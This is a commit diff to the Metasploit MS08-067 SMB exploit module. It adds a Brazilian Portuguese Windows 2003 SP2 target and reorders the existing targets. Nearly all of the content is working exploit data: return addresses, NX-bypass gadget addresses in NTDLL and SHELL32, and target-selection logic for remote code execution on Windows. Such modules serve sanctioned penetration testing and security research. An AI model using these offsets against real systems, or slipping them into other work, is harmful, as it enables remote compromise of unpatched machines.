Add Portuguese target, lands #3961 (also reorders targets)

2014-12-12 14:23:02 -06:00 · 2014-12-12 14:23:02 -06:00 · 50b734f996
parent 183acb9582
commit 50b734f996
1 changed files with 93 additions and 79 deletions
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@ -88,6 +88,14 @@ class Metasploit3 < Msf::Exploit::Remote
           }
          ], # JMP ESI SVCHOST.EXE
          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP0 Universal',
           {
             'Ret'       => 0x0100129e,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI SVCHOST.EXE
          #
          # ENGLISH TARGETS
          #
@ -128,79 +136,6 @@ class Metasploit3 < Msf::Exploit::Remote
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP0 Universal',
           {
             'Ret'       => 0x0100129e,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI SVCHOST.EXE
          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP1 English (NO NX)',
           {
             'Ret'       => 0x71bf21a2,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL
          # Brett Moore's crafty NX bypass for 2003 SP1
          ['Windows 2003 SP1 English (NX)',
           {
             'RetDec'    => 0x7c90568c,	 # dec ESI, ret @SHELL32.DLL
             'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],
          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP1 Japanese (NO NX)',
           {
             'Ret'       => 0x71a921a2,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL
          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP2 English (NO NX)',
           {
             'Ret'       => 0x71bf3969,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL
          # Brett Moore's crafty NX bypass for 2003 SP2
          ['Windows 2003 SP2 English (NX)',
           {
             'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
             'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],
          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP2 German (NO NX)',
           {
             'Ret'       => 0x71a03969,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL
          # Brett Moore's crafty NX bypass for 2003 SP2
          ['Windows 2003 SP2 German (NX)',
           {
             'RetDec'    => 0x7c98beb8,  # dec ESI, ret @NTDLL.DLL
             'RetPop'    => 0x7cb3e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c98a01b,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c95f517,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],
          #
          # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
          #
@ -637,12 +572,34 @@ class Metasploit3 < Msf::Exploit::Remote
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
          #
          # Windows 2003 Targets
          #
          # Standard return-to-ESI without NX bypass
-          # Provided by Masashi Fujiwara
+          ['Windows 2003 SP1 English (NO NX)',
          ['Windows 2003 SP2 Japanese (NO NX)',
           {
-             'Ret'       => 0x71a91ed2,
+             'Ret'       => 0x71bf21a2,
-             'Scratch'   => 0x00020408
+             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL
          # Brett Moore's crafty NX bypass for 2003 SP1
          ['Windows 2003 SP1 English (NX)',
           {
             'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
             'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],
          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP1 Japanese (NO NX)',
           {
             'Ret'       => 0x71a921a2,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL
@ -665,6 +622,54 @@ class Metasploit3 < Msf::Exploit::Remote
           }
          ],
          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP2 English (NO NX)',
           {
             'Ret'       => 0x71bf3969,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL
          # Brett Moore's crafty NX bypass for 2003 SP2
          ['Windows 2003 SP2 English (NX)',
           {
             'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
             'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],
          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP2 German (NO NX)',
           {
             'Ret'       => 0x71a03969,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL
          # Brett Moore's crafty NX bypass for 2003 SP2
          ['Windows 2003 SP2 German (NX)',
           {
             'RetDec'    => 0x7c98beb8,  # dec ESI, ret @NTDLL.DLL
             'RetPop'    => 0x7cb3e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c98a01b,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c95f517,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],
          # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
          [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],
          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP2 Spanish (NO NX)',
           {
@ -682,7 +687,16 @@ class Metasploit3 < Msf::Exploit::Remote
             'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
-          ]
+          ],
          # Standard return-to-ESI without NX bypass
          # Provided by Masashi Fujiwara
          ['Windows 2003 SP2 Japanese (NO NX)',
           {
             'Ret'       => 0x71a91ed2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI WS2HELP.DLL
          #
          # Missing Targets
@ -826,7 +840,7 @@ class Metasploit3 < Msf::Exploit::Remote
      # Windows 2003 SP0 is mostly universal
      if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack'
-        mytarget = targets[7]
+        mytarget = targets[3]
      end
      # Windows 2003 R2 is treated the same as 2003